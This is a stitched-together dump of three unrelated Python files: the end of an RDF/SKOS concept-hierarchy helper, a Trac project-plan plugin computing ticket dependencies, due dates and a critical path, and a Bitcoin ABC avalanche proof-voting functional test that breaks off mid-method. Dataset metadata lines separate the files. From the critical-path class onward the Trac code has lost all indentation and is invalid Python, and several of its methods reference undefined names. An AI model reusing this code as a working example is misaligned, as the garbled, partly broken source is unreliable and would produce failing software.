    for _, predicate, value in Config.g.triples((URIRef(uri), None, None)):
        if predicate in ignore:
            continue
        properties.append(((predicate, get_label(predicate)), value))
    return properties
def get_in_scheme(uri):
    """Return (scheme, label) pairs for every concept scheme the concept
    belongs to. A concept may be a member of more than one scheme."""
    return [(scheme, get_label(scheme))
            for scheme in Config.g.objects(URIRef(uri), SKOS.inScheme)]
def _add_narrower(uri, hierarchy, indent):
    """Append one markdown list line per narrower concept of *uri*,
    recursing depth-first with increasing indentation."""
    children = sorted(
        ((child, get_label(child))
         for child in Config.g.objects(URIRef(uri), SKOS.narrower)),
        key=lambda pair: pair[1])
    for child, label in children:
        hierarchy += '{}- [{}]({})\n'.format(
            indent * '\t', label, url_for('routes.ob', uri=child))
        hierarchy = _add_narrower(child, hierarchy, indent + 1)
    return hierarchy
def get_concept_hierarchy(uri):
    """Render the concept hierarchy of scheme *uri* as an HTML nested list
    (markdown converted to HTML)."""
    tops = sorted(
        ((top, get_label(top))
         for top in Config.g.objects(URIRef(uri), SKOS.hasTopConcept)),
        key=lambda pair: pair[1])
    md = ''
    for top, label in tops:
        md += '- [{}]({})\n'.format(label, url_for('routes.ob', uri=top))
        md = _add_narrower(top, md, 1)
    return '<div id="concept-hierarchy">' + markdown.markdown(md) + '</div>'
def get_is_defined_by(uri):
    """Return the first rdfs:isDefinedBy of *uri*, or None."""
    return next(iter(Config.g.objects(URIRef(uri), RDFS.isDefinedBy)), None)
def get_close_match(uri):
    """Return all skos:closeMatch resources of *uri*."""
    return list(Config.g.objects(URIRef(uri), SKOS.closeMatch))
def get_exact_match(uri):
    """Return all skos:exactMatch resources of *uri*."""
    return list(Config.g.objects(URIRef(uri), SKOS.exactMatch))
def get_bibliographic_citation(uri):
    """Return the first dcterms:bibliographicCitation of *uri*, or None."""
    return next(iter(Config.g.objects(URIRef(uri), DCTERMS.bibliographicCitation)), None)
def _first_object(uri, predicate):
    """Return the first object of *predicate* on *uri*, or None."""
    return next(iter(Config.g.objects(URIRef(uri), predicate)), None)
def _first_labelled_object(uri, predicate):
    """Return (resource, label) for the first object of *predicate* on
    *uri*, or None if there is none."""
    obj = _first_object(uri, predicate)
    if obj is None:
        return None
    return (obj, get_label(obj))
def get_schema_org_parent_org(uri):
    """Return (org, label) for the schema:parentOrganization of *uri*, or None."""
    return _first_labelled_object(uri, SCHEMAORG.parentOrganization)
def get_schema_org_contact_point(uri):
    """Return (contact, label) for the schema:contactPoint of *uri*, or None."""
    return _first_labelled_object(uri, SCHEMAORG.contactPoint)
def get_schema_org_members(uri):
    """Return (member, label) pairs for every schema:member of *uri*."""
    return [(member, get_label(member))
            for member in Config.g.objects(URIRef(uri), SCHEMAORG.member)]
def get_schema_org_sub_orgs(uri):
    """Return (org, label) pairs for every schema:subOrganization of *uri*."""
    return [(org, get_label(org))
            for org in Config.g.objects(URIRef(uri), SCHEMAORG.subOrganization)]
def get_schema_org_family_name(uri):
    """Return the schema:familyName of *uri*, or None."""
    return _first_object(uri, SCHEMAORG.familyName)
def get_schema_org_given_name(uri):
    """Return the schema:givenName of *uri*, or None."""
    return _first_object(uri, SCHEMAORG.givenName)
def get_schema_org_honorific_prefix(uri):
    """Return the schema:honorificPrefix of *uri*, or None."""
    return _first_object(uri, SCHEMAORG.honorificPrefix)
def get_schema_org_job_title(uri):
    """Return the schema:jobTitle of *uri*, or None."""
    return _first_object(uri, SCHEMAORG.jobTitle)
def get_schema_org_member_of(uri):
    """Return (org, label) for the schema:memberOf of *uri*, or None."""
    return _first_labelled_object(uri, SCHEMAORG.memberOf)
trac/Lib/site-packages/projectplan-0.93.0-py2.7-patched.egg/projectplan/pptickets.py | thinkbase/PortableTrac | 2 | 12767435 | <reponame>thinkbase/PortableTrac<gh_stars>1-10
# -*- coding: utf-8 -*-
import datetime
import pputil
from trac.util.datefmt import to_datetime, utc
from trac.ticket.model import Ticket
class TSExtensionRegister(object):
    '''
    Registry mapping extension names to TicketSet extension classes.
    '''
    # TODO: class for Render/TicketSet extension with documentation, so
    # documentation can be generated for the macro (Trac WikiMacro listing).
    __registry = {}
    @classmethod
    def add(cls, registrantcls, registername):
        '''
        Register the extension class under the given name.
        '''
        cls.__registry[registername] = registrantcls
    @classmethod
    def keys(cls):
        '''
        Enumerate the registered extension names.
        '''
        return cls.__registry.keys()
    @classmethod
    def get(cls, registername):
        '''
        Look up the extension class registered under the given name.
        '''
        return cls.__registry[registername]
class ppTicket():
    '''
    Project plan ticket: wraps a stored ticket data dict and carries
    additional, computed "extension" fields.
    '''
    def __init__(self,dataref,ticketset):
        '''
        Initialize with the stored ticket data dict and the owning
        ppTicketSet object.
        '''
        # NOTE(review): the ticketset argument is accepted but never stored
        # or used -- TODO confirm whether it can be dropped.
        self.__dataref = dataref
        self.__extensions = dict()
    def hasfield(self,name):
        '''
        Check whether the ticket data has a key <name>.
        '''
        return name in self.__dataref
    def getfield(self,name):
        '''
        Return the ticket data for key <name> (KeyError if absent).
        '''
        return self.__dataref[ name ]
    def getfielddefs( self ):
        '''
        Return the set of valid fields.
        '''
        # NOTE(review): `TicketSet` is not defined in this module, so calling
        # this raises NameError -- presumably ppTicketSet.getfielddefs() was
        # intended; TODO confirm.
        #return self.__dataref.keys()
        return TicketSet.getfielddefs()
    def getfielddef(self,name,defval):
        '''
        Return the ticket data for key <name>, or <defval> when the key is
        missing or its value is falsy.
        '''
        if self.hasfield(name) and self.getfield(name):
            return self.__dataref[ name ]
        else:
            return defval
    def hasextension(self,name):
        '''
        Check whether a ticket extension with key <name> exists.
        '''
        return name in self.__extensions
    def getextension(self,name):
        '''
        Return the ticket extension for key <name>, or None.
        '''
        if self.hasextension( name ):
            return self.__extensions[ name ]
        else:
            return None
    def _setextension(self,name,data):
        '''
        Set an extension field.
        '''
        self.__extensions[ name ] = data
    def _delextension(self,name):
        '''
        Delete an extension field (e.g. one temporarily used by an
        extension).
        '''
        del self.__extensions[ name ]
    def get_changelog( self ):
        # NOTE(review): broken as written -- ppTicket has no attribute `env`
        # and `id` here is the builtin function, so this raises at runtime.
        # TODO confirm whether this method is ever called.
        t = Ticket(self.env, id)
        return( t.get_changelog() )
    def getstatus( self ):
        '''
        Return the status field of the ticket.
        '''
        return self.getfield('status')
    def getpriority( self ) :
        '''
        Return the priority field of the ticket.
        '''
        return self.getfield('priority')
class ppTicketSet():
    '''
    Container for the ppTicket objects of one macro invocation, plus
    ticket-set level extension fields.
    '''
    def __init__(self, macroenv):
        '''
        Initialize the empty ticket set for the given macro environment.
        '''
        self.__extensions = dict()
        self.macroenv = macroenv
        self.__tickets = dict()
    def addTicket(self,ticket):
        '''
        Add a new ticket built from the ticket data dict <ticket>.
        '''
        self.__tickets[ ticket['id'] ] = ppTicket(ticket,self)
    def deleteTicket(self,ticket):
        '''
        Remove the ticket described by the ticket data dict <ticket>.
        '''
        self.deleteTicketId(ticket['id'])
    def deleteTicketId(self, tid):
        '''
        Remove the ticket with id <tid>; a missing id is silently ignored.
        '''
        # Narrowed from a bare "except:"; only a missing id is expected here.
        try:
            del self.__tickets[ tid ]
        except KeyError:
            pass
    @classmethod
    def getfielddefs( self ):
        '''
        Return the names of all ticket fields.
        '''
        # NOTE(review): broken as written -- TicketSystem is not imported in
        # this module and a classmethod has no macroenv attribute, so calling
        # this raises. TODO confirm whether it is ever used.
        return [ f['name'] for f in TicketSystem( self.macroenv.tracenv ).get_ticket_fields() ]
    def getIDList(self):
        '''
        Return the ids of the tickets in this set.
        '''
        return self.__tickets.keys()
    def getIDSortedList(self):
        '''
        Return a sorted list of the ticket ids in this set.
        '''
        # sorted() works on Python 2 and 3; dict.keys().sort() is Py2-only.
        return sorted( self.__tickets.keys() )
    def getTicket(self,id):
        '''
        Return the ppTicket object for the ticket with id <id>.
        '''
        try:
            return self.__tickets[ id ]
        except KeyError:
            raise Exception('ticket not available: #%s (maybe increase the value of max_ticket_number_at_filters)' % (id,))
    def hasExtension(self,name):
        '''
        Check whether a ticket-set extension with key <name> exists.
        '''
        return name in self.__extensions
    def getExtension(self,name):
        '''
        Return the ticket-set extension for key <name>, or None.
        '''
        if self.hasExtension( name ):
            return self.__extensions[ name ]
        else:
            return None
    def needExtension(self,name):
        '''
        Ensure the extension <name> has been executed on this ticket set.
        '''
        if self.hasExtension( name ):
            return
        else:
            if name in TSExtensionRegister.keys():
                extcls = TSExtensionRegister.get( name )
                if (extcls!=None):
                    extensiono = extcls( self, self.__tickets )
                    if (extensiono!=None):
                        exttsdata = extensiono.extend()
                        self.__extensions[ name ] = exttsdata
                        return
            # NOTE(review): TracError is not imported in the visible imports;
            # this would raise NameError instead -- TODO confirm.
            raise TracError( 'extension "%s" went missing or failed' % name )
    def get_changelog( self , ticketid):
        '''
        Return the Trac changelog for <ticketid>, or [] on failure.
        '''
        t = Ticket(self.macroenv.tracenv, ticketid)
        # Narrowed from a bare "except:" so Ctrl-C etc. still propagate.
        try:
            return( t.get_changelog() )
        except Exception:
            self.macroenv.tracenv.log.warn("get_changelog failed on ticket %s", ticketid)
            return [] # no changelogs
class ppTicketSetExtension():
    '''
    Base class for TicketSet extensions; concrete extensions override
    extend().
    '''
    def __init__(self, ticketset, ticketsetdata):
        # The base extension needs neither argument.
        pass
    def extend(self):
        '''
        Run the extension over the ticket set, extending tickets and/or
        the ticket set with extension fields. Return anything except None
        to mark this extension as executed; the returned value is stored
        in the matching extension field.
        '''
        return True
# Register the base extension under the name 'base'.
TSExtensionRegister.add( ppTicketSetExtension, 'base' )
class ppTSLastChange( ppTicketSetExtension ):
    '''
    Determine the most recent 'changetime' among all tickets in the set.
    '''
    def __init__(self, ticketset, ticketsetdata):
        self.__ts = ticketsetdata
    def extend(self):
        '''
        Return the latest change time as a datetime. Tickets without a
        changetime count as "changed now"; the scan stops early once "now"
        is reached, since nothing can be newer.
        '''
        now = to_datetime( datetime.datetime.now(utc) )
        latest = to_datetime( 0, utc )
        for ticket in self.__ts.values():
            changed = to_datetime( ticket.getfielddef( 'changetime', now ) )
            if changed > latest:
                latest = changed
            if latest == now:
                break
        return latest
TSExtensionRegister.add( ppTSLastChange, 'tslastchange' )
class ppTSSetOfField( ppTicketSetExtension ):
    '''
    Build a sorted list of the distinct values of one ticket field.
    Subclasses set FieldName (and optionally DefValue).
    '''
    FieldName = ''
    DefValue = ''
    def __init__(self, ticketset, ticketsetdata):
        '''
        Keep a reference to the ticket data.
        '''
        self.__ts = ticketsetdata
    def extend(self):
        '''
        Collect the value of FieldName from every ticket (falling back to
        DefValue) and return the distinct values in sorted order.
        '''
        distinct = set(
            ticket.getfielddef(self.FieldName, self.DefValue)
            for ticket in self.__ts.values())
        return sorted(distinct)
class ppTSVersions( ppTSSetOfField ):
    '''
    Sorted set of all distinct values of the 'version' ticket field.
    '''
    FieldName = 'version'
# Register under the name 'tsversions'.
TSExtensionRegister.add( ppTSVersions, 'tsversions' )
class ppTSMilestones( ppTSSetOfField ):
    '''
    Sorted set of all distinct values of the 'milestone' ticket field.
    '''
    FieldName = 'milestone'
# Register under the name 'tsmilestones'.
TSExtensionRegister.add( ppTSMilestones, 'tsmilestones' )
class ppTSDependencies( ppTicketSetExtension ):
    '''
    Resolve ticket dependencies inside the current ticket set.

    Writes two extension fields per ticket:
      * all_dependencies -- every ticket id listed in the configured
        dependency field, resolvable or not;
      * dependencies -- the ppTicket objects for those ids that actually
        exist in this ticket set.
    '''
    def __init__(self, ticketset, ticketsetdata):
        self.__tso = ticketset
        self.__ts = ticketsetdata
    def extend(self):
        '''
        Parse the configured dependency field of every ticket and fill
        the all_dependencies / dependencies extension fields.
        '''
        depfield = self.__tso.macroenv.conf.get( 'custom_dependency_field' )
        for ticket in self.__ts.values():
            wanted_ids = pputil.ticketIDsFromString(ticket.getfielddef(depfield, ''))
            ticket._setextension('all_dependencies', wanted_ids)
            # Only ids present in this set can be resolved to ticket objects.
            resolved = set(self.__ts[tid] for tid in wanted_ids if tid in self.__ts)
            ticket._setextension('dependencies', resolved)
        return True
TSExtensionRegister.add( ppTSDependencies, 'dependencies' )
class ppTSReverseDependencies( ppTicketSetExtension ):
    '''
    Compute reverse dependencies from the 'dependencies' extension field.

    The result is a set of ppTicket objects per ticket; tickets outside
    the current ticket set can never appear as reverse dependencies.
    '''
    def __init__(self, ticketset, ticketsetdata):
        self.__ts = ticketsetdata
        # Forward dependencies must be computed first.
        ticketset.needExtension( 'dependencies' )
    def extend(self):
        '''
        Invert the dependency relation into reverse_dependencies fields.
        '''
        # Start every ticket with an empty reverse-dependency set.
        for ticket in self.__ts.values():
            ticket._setextension('reverse_dependencies', set())
        # For each edge ticket -> dep, record ticket as a reverse
        # dependency of dep.
        for ticket in self.__ts.values():
            for dep in ticket.getextension('dependencies'):
                dep.getextension('reverse_dependencies').add(ticket)
        return True
TSExtensionRegister.add( ppTSReverseDependencies, 'reverse_dependencies' )
class ppTSDueTimes( ppTicketSetExtension ):
    '''
    Calculate the due-time values.

    First, convert the assign/close text fields into date values.
    Second, calculate worktime / assign delay / closing delay without
    accessing the database.
    Third, calculate start and finish dates.
    '''
    def __init__(self,ticketset,ticketsetdata):
        '''
        Initialize with the ticket set and ticket data; make sure the
        dependency extension has been computed.
        '''
        self.__tso = ticketset
        self.__ts = ticketsetdata
        # NOTE(review): needExtension() returns None, so this condition is
        # always true, and rebinding the local name `self` has no effect.
        # TODO confirm intent.
        if not ticketset.needExtension( 'dependencies' ):
            self = None
    def fieldtodatetime(self,v,field,dtf):
        '''
        Convert the ticket field <field> of ticket <v>, interpreted with
        the date format mask <dtf> (e.g. 'DD/MM/YYYY'), into a
        datetime.date, or None on empty/placeholder/unparsable input.
        '''
        theDate = v.getfielddef( field, 'DD/MM/YYYY' )
        # Skip empty values and the unfilled placeholder masks.
        if theDate != '' and theDate != 'MM/DD/YYYY' and theDate != 'DD/MM/YYYY':
            AtheDate = None
            if dtf == 'DD/MM/YYYY':
                AtheDate = theDate.split('/');
                day_key = 0;
                month_key = 1;
                year_key = 2;
            if dtf == 'MM/DD/YYYY':
                AtheDate = theDate.split('/');
                month_key = 0;
                day_key = 1;
                year_key = 2;
            if dtf == 'DD.MM.YYYY':
                AtheDate = theDate.split('.');
                day_key = 0;
                month_key = 1;
                year_key = 2;
            if dtf == 'YYYY-MM-DD':
                AtheDate = theDate.split('-');
                year_key = 0;
                month_key = 1;
                day_key = 2;
            try:
                if AtheDate and len(AtheDate) == 3:
                    year=int(AtheDate[year_key]);
                    month=int(AtheDate[month_key]);
                    day=int(AtheDate[day_key]);
                    #return datetime.datetime(year,month,day)
                    return datetime.date(year,month,day) # catch 64 bit problem
            except:
                # a problem appeared while parsing the date field
                # TODO: raise error message
                pass
        return None
    def extend(self):
        '''
        Calculate date values for assign and closing time, attach their
        difference to the current date (in days) as assigndiff and
        closingdiff extension fields, calculate the workload
        (closing - assign time) or a default workload, and compute start
        and finish dates per ticket. On-time tickets keep their given
        dates; overdue tickets are shifted from "now" so the workload
        stays constant. No time is calculated when both assign and close
        time are missing. (Dependencies are not used here.)
        '''
        adatefield = self.__tso.macroenv.conf.get( 'custom_due_assign_field' )
        cdatefield = self.__tso.macroenv.conf.get( 'custom_due_close_field' )
        adateformat = self.__tso.macroenv.conf.get( 'ticketassignedf' )
        cdateformat = self.__tso.macroenv.conf.get( 'ticketclosedf' )
        #dateNow = datetime.datetime.today()
        dateNow = datetime.date.today() # catch 64 bit problems
        for k in self.__ts:
            v = self.__ts[ k ]
            # set date values for assign/close - those can be None!
            adateTicket = self.fieldtodatetime( v, adatefield, adateformat )
            cdateTicket = self.fieldtodatetime( v, cdatefield, cdateformat )
            # defaultvalue -> conf
            # default workload (days) used when only one date is known
            defworktime = 1
            if adateTicket:
                v._setextension( 'assigndiff', (dateNow - adateTicket ).days )
            if cdateTicket:
                v._setextension( 'closingdiff', (dateNow - cdateTicket ).days )
            if (cdateTicket!=None) and (adateTicket!=None):
                v._setextension( 'worktime', ( cdateTicket - adateTicket ).days )
            else:
                v._setextension( 'worktime', defworktime )
            ptimedelta = datetime.timedelta( days = defworktime )
            if (cdateTicket!=None) or (adateTicket!=None):
                # Derive the missing date from the known one using the
                # default worktime.
                if cdateTicket:
                    adateTicket = cdateTicket - ptimedelta
                if adateTicket:
                    cdateTicket = adateTicket + ptimedelta
                if ( not v.hasextension( 'assigndiff' ) ) or ( not v.hasextension( 'closingdiff' ) ):
                    if v.hasextension( 'assigndiff' ):
                        v._setextension( 'closingdiff', v.getextension( 'assigndiff' ) - defworktime )
                    if v.hasextension( 'closingdiff' ):
                        v._setextension( 'assigndiff', v.getextension( 'closingdiff' ) + defworktime )
                if (adateTicket!=None) and (cdateTicket!=None):
                    ###### static workload calculation
                    # Shift overdue tickets forward so the workload
                    # (finish - start) stays constant.
                    if ( v.getextension( 'assigndiff' ) > 0 ) or ( v.getextension( 'closingdiff' ) > 0 ):
                        if v.getextension( 'assigndiff' ) > 0:
                            ptimedelta = datetime.timedelta( days = v.getextension( 'assigndiff' ) )
                            adateTicket = adateTicket + ptimedelta
                            cdateTicket = cdateTicket + ptimedelta
                        else:
                            ptimedelta = datetime.timedelta( days = v.getextension( 'closingdiff' ) )
                            cdateTicket = cdateTicket + ptimedelta
                    ######
                    v._setextension( 'startdate', adateTicket )
                    v._setextension( 'finishdate', cdateTicket )
        return True
# Register under the name 'duetimediffs'.
TSExtensionRegister.add( ppTSDueTimes, 'duetimediffs' )
# Add project start and end tickets to the critical path analysis:
# -- inject pseudo tickets
# -- run the computation
# -- remove the pseudo tickets again and store dependencies / reverse
#    dependencies / start / end in ticket-set extension fields.
# This makes it possible to add the dependencies to the Graphviz renderers
# afterwards.
class ppTSCriticalPathSimple( ppTicketSetExtension ):
BETickets_Begin = 999999
BETickets_End = 1000000
def __init__(self,ticketset,ticketsetdata):
self.__ts = ticketsetdata
self.ticketset = ticketset
self.ticketset.needExtension( 'dependencies' )
self.ticketset.needExtension( 'reverse_dependencies' )
self.ticketset.needExtension( 'duetimediffs' )
def _inject_start_end(self ):
'''
Add Pseudo Project Begin and End Tickets
- Begin Ticket has the Time t1 of earliest Ticket or
now if now < t1
- End Ticket has the Time t2 of latest Ticket or
now if t2 < now
'''
# get the starting tickets
starts = set()
for k in self.__ts:
if len(self.__ts[ k ].getextension( 'dependencies' )) <= 0:
starts.add( self.__ts[ k ] )
dateNow = datetime.datetime.today()
# add the pseudo ticket
dateStart = dateNow
for t in starts:
if t.hasextension( 'startdate' ) and (
t.getextension( 'startdate' ) != None ) and (
t.getextension( 'startdate' ) < dateStart ):
dateStart = t.getextension( 'startdate' )
if dateStart < dateNow:
pseudostat = 'closed'
else:
pseudostat = 'new'
pseudoticket = { 'id' : self.BETickets_Begin,
'status': pseudostat }
self.ticketset.addTicket( pseudoticket )
# add extensions to the new pseudo ticket
ppstartticket = self.__ts[ self.BETickets_Begin ]
ppstartticket._setextension( 'dependencies', set() )
ppstartticket._setextension( 'reverse_dependencies', starts )
ppstartticket._setextension( 'startdate', dateStart )
ppstartticket._setextension( 'finishdate', dateStart )
# fix dependencies for "old" starting tickets
for t in starts:
t.getextension( 'dependencies' ).add( ppstartticket )
# reverse procedure for the end ticket
ends = set()
for k in self.__ts:
if len(self.__ts[ k ].getextension( 'reverse_dependencies' )) <= 0:
ends.add( self.__ts[ k ] )
# add the pseudo ticket
dateEnd = dateNow
for t in ends:
if t.hasextension( 'finishdate' ) and (
t.getextension( 'finishdate' ) != None ) and (
t.getextension( 'finishdate' ) > dateEnd ):
dateEnd = t.getextension( 'finishdate' )
pseudostat = 'new'
pseudoticket = { 'id' : self.BETickets_End,
'status': pseudostat }
self.ticketset.addTicket( pseudoticket )
# add extensions to the new pseudo ticket
ppendticket = self.__ts[ self.BETickets_End ]
ppendticket._setextension( 'dependencies', ends )
ppendticket._setextension( 'reverse_dependencies', set() )
ppendticket._setextension( 'startdate', dateEnd )
ppendticket._setextension( 'finishdate', dateEnd )
# fix dependencies for "old" starting tickets
for t in ends:
t.getextension( 'reverse_dependencies' ).add( ppendticket )
def _cleanup_start_end(self ):
# prepare results - because both start and end are critical and buffers
# are set in inner Tickets, the usefull data is time/dependencies
result = { 'starts': self.__ts[ self.BETickets_Begin ].getextension( 'reverse_dependencies' ),
'startdate': self.__ts[ self.BETickets_Begin ].getextension( 'startdate' ),
'ends': self.__ts[ self.BETickets_End ].getextension( 'dependencies' ),
'enddate': self.__ts[ self.BETickets_End ].getextension( 'finishdate' ) }
# remove reverse_dependencies from starttickets (just empty them, they where empty before!)
for t in result[ 'starts' ]:
t._setextension( 'dependencies', set() )
# same for end tickets + cleanup the mindepbuffer extension field which references the nonexisting endticket
for t in result[ 'ends' ]:
t._setextension( 'reverse_dependencies', set() )
if t.hasextension( 'mindepbuffers' ):
t._setextension( 'mindepbuffers', [] )
# remove the pseudo tickets
del self.__ts[ self.BETickets_Begin ]
del self.__ts[ self.BETickets_End ]
return result
def extend(self):
betickets = "betickets" in self.ticketset.macroenv.macroargs
if betickets:
self._inject_start_end()
# pass 1, check for start and finish dates
for k in self.__ts:
v = self.__ts[ k ]
if (not v.hasextension( 'startdate' )) or (not v.hasextension( 'finishdate' )):
if betickets:
self._cleanup_start_end()
return False
# pass 2. get the first nodes for topological run
queue = []
for k in self.__ts:
if len(self.__ts[ k ].getextension( 'dependencies' )) <= 0:
queue.append( k )
# pass 3. breadth first topological run, calculate buffer times per dependency
while len(queue)>0:
current = queue.pop(0)
if not self.__ts[ current ].hasextension( 'depbuffers' ):
deps = self.__ts[ current ].getextension( 'reverse_dependencies' )
depbuffers = []
for d in deps:
if d.getfielddef( 'status', '' )!='closed':
if self.__ts[ current ].getfielddef( 'status', '' )!='closed':
depbuffer = ( d.getfield('id'), ( d.getextension( 'startdate' ) - self.__ts[ current ].getextension( 'finishdate' ) ).days )
else:
depbuffer = ( d.getfield('id'), ( d.getextension( 'startdate' ) - self.__ts[ current ].getextension( 'startdate' ) ).days )
else:
depbuffer = ( d.getfield('id'), 0 )
depbuffers.append( depbuffer )
queue.append( d.getfield('id') )
self.__ts[ current ]._setextension( 'depbuffers', depbuffers )
# pass 4. get the first nodes for reverse run
queue = []
for k in self.__ts:
if len(self.__ts[ k ].getextension( 'depbuffers' )) <= 0:
queue.append( k )
# pass 5. breadth first in reverse order, calculate the deps with min. cumulative buffers
runtest = 0; # var for endless loop check (cyclic dependencies in graph)
startnode_minbuffer = 36500
while ( len(queue) > 0 ) and (runtest <= ( 3*len( queue ) ) ):
current = queue.pop(0)
if not self.__ts[ current ].hasextension( 'mindepbuffers' ):
depbufs = self.__ts[ current ].getextension( 'depbuffers' )
depbufsresolved = True
for (k,buf) in depbufs:
if not self.__ts[ k ].hasextension( 'mindepbuffers' ):
depbufsresolved = False
break
if not depbufsresolved:
# dependend buffermins are not calculated, recycle the current node for later testing
queue.append( current )
runtest = runtest +1
else:
runtest = 0
for d in self.__ts[ current ].getextension( 'dependencies' ):
queue.append( d.getfield('id') )
mindepbuffers = []
if len(depbufs)>0:
minbuf = 36500
for (k,buf) in depbufs:
cbuf = ( buf + self.__ts[ k ].getextension( 'buffer' ) )
if cbuf < minbuf:
minbuf = cbuf
self.__ts[ current ]._setextension( 'buffer', minbuf )
if len(self.__ts[ current ].getextension( 'dependencies' )) <= 0:
if minbuf < startnode_minbuffer:
startnode_minbuffer = minbuf
for (k,buf) in depbufs:
cbuf = ( buf + self.__ts[ k ].getextension( 'buffer' ) )
if cbuf <= minbuf:
mindepbuffers.append( k )
else:
self.__ts[ current ]._setextension( 'buffer', 0 )
self.__ts[ current ]._setextension( 'mindepbuffers', mindepbuffers )
else:
runtest = 0
if len(queue) > 0:
raise Exception( " Cyclic dependencies found, fix dependencies or remove critical path analysis " )
#return False
# pass 6. get the first nodes for min buffer pathes
queue = []
for k in self.__ts:
if ( len(self.__ts[ k ].getextension( 'dependencies' )) <= 0 ) and ( self.__ts[ k ].getextension( 'buffer' ) <= startnode_minbuffer):
queue.append( k )
# pass 7. mark the critical path
while len(queue) > 0:
current = queue.pop(0)
self.__ts[ current ]._setextension( 'critical', True )
for d in self.__ts[ current ].getextension( 'mindepbuffers' ):
queue.append( d )
# cleanup depbuffers
for k in self.__ts:
if self.__ts[ k ].hasextension( 'depbuffers' ):
self.__ts[ k ]._delextension( 'depbuffers' )
if betickets:
return self._cleanup_start_end()
else:
return True
TSExtensionRegister.add( ppTSCriticalPathSimple, 'criticalpath_simple' )
| 2.09375 | 2 |
#!/usr/bin/env python3
# Source file: test/functional/abc_p2p_avalanche_proof_voting.py (johnkuney/bitcoin-abc)
# Copyright (c) 2021 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the resolution of conflicting proofs via avalanche."""
import time
from test_framework.avatools import (
create_coinbase_stakes,
gen_proof,
get_ava_p2p_interface,
get_proof_ids,
)
from test_framework.key import ECPubKey
from test_framework.messages import (
AvalancheVote,
AvalancheVoteError,
FromHex,
LegacyAvalancheProof,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_raises_rpc_error, try_rpc
from test_framework.wallet_util import bytes_to_wif
QUORUM_NODE_COUNT = 16
class AvalancheProofVotingTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.conflicting_proof_cooldown = 100
self.peer_replacement_cooldown = 2000
self.extra_args = [
['-enableavalanche=1', '-enableavalancheproofreplacement=1',
f'-avalancheconflictingproofcooldown={self.conflicting_proof_cooldown}', f'-avalanchepeerreplacementcooldown={self.peer_replacement_cooldown}', '-avacooldown=0'],
]
self.supports_cli = False
# Build a fake quorum of nodes.
def get_quorum(self, node):
quorum = [get_ava_p2p_interface(node)
for _ in range(0, QUORUM_NODE_COUNT)]
for n in quorum:
success = node.addavalanchenode(
n.nodeid,
self.privkey.get_pubkey().get_bytes().hex(),
self.quorum_proof.serialize().hex(),
)
assert success is True
return quorum
def can_find_proof_in_poll(self, hash, response):
found_hash = False
for n in self.quorum:
poll = n.get_avapoll_if_available()
# That node has not received a poll
if poll is None:
continue
# We got a poll, check for the hash and repond
votes = []
for inv in poll.invs:
# Vote yes to everything
r = AvalancheVoteError.ACCEPTED
# Look for what we expect
if inv.hash == hash:
r = response
found_hash = True
votes.append(AvalancheVote(r, inv.hash))
n.send_avaresponse(poll.round, votes, self.privkey)
return found_hash
@staticmethod
def send_proof(from_peer, proof_hex):
proof = FromHex(LegacyAvalancheProof(), proof_hex)
from_peer.send_avaproof(proof)
return proof.proofid
def send_and_check_for_polling(self, peer,
proof_hex, response=AvalancheVoteError.ACCEPTED):
proofid = self.send_proof(peer, proof_hex)
self.wait_until(lambda: self.can_find_proof_in_poll(proofid, response))
def build_conflicting_proof(self, node, sequence):
return node.buildavalancheproof(
sequence, 0, self.privkey_wif, self.conflicting_stakes)
def run_test(self):
node = self.nodes[0]
self.privkey, self.quorum_proof = gen_proof(node)
self.privkey_wif = bytes_to_wif(self.privkey.get_bytes())
self.quorum = self.get_quorum(node)
addrkey0 = node.get_deterministic_priv_key()
blockhash = node.generatetoaddress(10, addrkey0.address)
self.conflicting_stakes = create_coinbase_stakes(
node, blockhash[5:], addrkey0.key)
self.poll_tests(node)
self.update_tests(node)
def poll_tests(self, node):
proof_seq10 = self.build_conflicting_proof(node, 10)
proof_seq20 = self.build_conflicting_proof(node, 20)
proof_seq30 = self.build_conflicting_proof(node, 30)
proof_seq40 = self.build_conflicting_proof(node, 40)
orphan = node.buildavalancheproof(
100, 2000000000, self.privkey_wif, [{
'txid': '0' * 64,
'vout': 0,
'amount': 10e6,
'height': 42,
'iscoinbase': False,
'privatekey': self.privkey_wif,
}]
)
no_stake = node.buildavalancheproof(
200, 2000000000, self.privkey_wif, []
)
# Get the key so we can verify signatures.
avakey = ECPubKey()
avakey.set(bytes.fromhex(node.getavalanchekey()))
self.log.info("Trigger polling from the node...")
peer = get_ava_p2p_interface(node)
mock_time = int(time.time())
node.setmocktime(mock_time)
self.log.info("Check we poll for valid proof")
self.send_and_check_for_polling(peer, proof_seq30)
self.log.info(
"Check we don't poll for subsequent proofs if the cooldown is not elapsed, proof not the favorite")
with node.assert_debug_log(["Not polling the avalanche proof (cooldown-not-elapsed)"]):
peer.send_avaproof(FromHex(LegacyAvalancheProof(), proof_seq20))
self.log.info(
"Check we don't poll for subsequent proofs if the cooldown is not elapsed, proof is the favorite")
with node.assert_debug_log(["Not polling the avalanche proof (cooldown-not-elapsed)"]):
peer.send_avaproof(FromHex(LegacyAvalancheProof(), proof_seq40))
self.log.info(
"Check we poll for conflicting proof if the proof is not the favorite")
mock_time += self.conflicting_proof_cooldown
node.setmocktime(mock_time)
self.send_and_check_for_polling(
peer, proof_seq20, response=AvalancheVoteError.INVALID)
self.log.info(
"Check we poll for conflicting proof if the proof is the favorite")
mock_time += self.conflicting_proof_cooldown
node.setmocktime(mock_time)
self.send_and_check_for_polling(peer, proof_seq40)
mock_time += self.conflicting_proof_cooldown
node.setmocktime(mock_time)
self.log.info("Check we don't poll for orphans")
with node.assert_debug_log(["Not polling the avalanche proof (orphan-proof)"]):
peer.send_avaproof(FromHex(LegacyAvalancheProof(), orphan))
self.log.info("Check we don't poll for proofs that get rejected")
with node.assert_debug_log(["Not polling the avalanche proof (rejected-proof)"]):
peer.send_avaproof(FromHex(LegacyAvalancheProof(), proof_seq10))
self.log.info("Check we don't poll for invalid proofs and get banned")
with node.assert_debug_log(["Misbehaving", "invalid-proof"]):
peer.send_avaproof(FromHex(LegacyAvalancheProof(), no_stake))
peer.wait_for_disconnect()
def update_tests(self, node):
# Restart the node to get rid og in-flight requests
self.restart_node(0)
mock_time = int(time.time())
node.setmocktime(mock_time)
self.quorum = self.get_quorum(node)
peer = get_ava_p2p_interface(node)
